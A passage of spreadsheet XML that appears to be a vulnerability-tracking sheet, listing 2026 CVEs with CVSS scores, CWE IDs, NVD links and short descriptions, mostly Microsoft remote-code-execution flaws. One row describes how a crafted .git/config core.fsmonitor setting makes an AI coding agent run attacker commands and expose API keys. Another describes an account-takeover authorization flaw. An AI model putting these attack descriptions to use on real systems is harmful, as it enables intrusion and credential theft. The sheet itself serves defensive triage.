          <t>CVE-2026-71352</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr"/>
      <c r="Q322" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71963</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr"/>
      <c r="Q323" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.18.2 through 0.21.0, fixed in commit f6234d0, contains a remote code execution vulnerability that allows attackers to execute arbitrary OS commands by supplying a malicious repository with a crafted .git/config that sets core.fsmonitor to an attacker-controlled command. When a user opens the malicious repository and sends any message, the agent triggers a git status index refresh which executes the injected command in the user's process context, exposing the full environment including configured provider API keys.</t>
        </is>
      </c>
      <c r="S323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71963</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72933</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72940</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr"/>
      <c r="Q325" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72950</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr"/>
      <c r="Q326" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72959</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr"/>
      <c r="Q327" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72960</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr"/>
      <c r="Q328" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72972</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr"/>
      <c r="Q329" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72973</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr"/>
      <c r="Q330" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72986</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr"/>
      <c r="Q331" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr"/>
      <c r="Q332" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73012</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr"/>
      <c r="Q333" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73013</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr"/>
      <c r="Q334" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73018</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr"/>
      <c r="Q336" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73023</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr"/>
      <c r="Q337" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73028</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K338" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr"/>
      <c r="Q338" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76647</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr"/>
      <c r="Q339" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>Leantime JSON-RPC API through version 3.9.0 contains a missing authorization vulnerability in the JSON-RPC dispatcher in app/Domain/Api/Controllers/Jsonrpc.php. The dispatcher does not enforce authorization before invoking service-layer methods, allowing an authenticated user to call methods or act on resources outside their intended permissions. For example, the editOwn method accepts a user-supplied user ID without verifying that it belongs to the caller, allowing an attacker to modify another user's account and set a new password, resulting in account takeover. This vulnerability is distinct from CVE-2026-59712 and CVE-2026-15509 because the root cause is the lack of centralized authorization enforcement in the JSON-RPC dispatcher rather than the behavior of an individual exposed method.</t>
        </is>
      </c>
      <c r="S339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76647</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
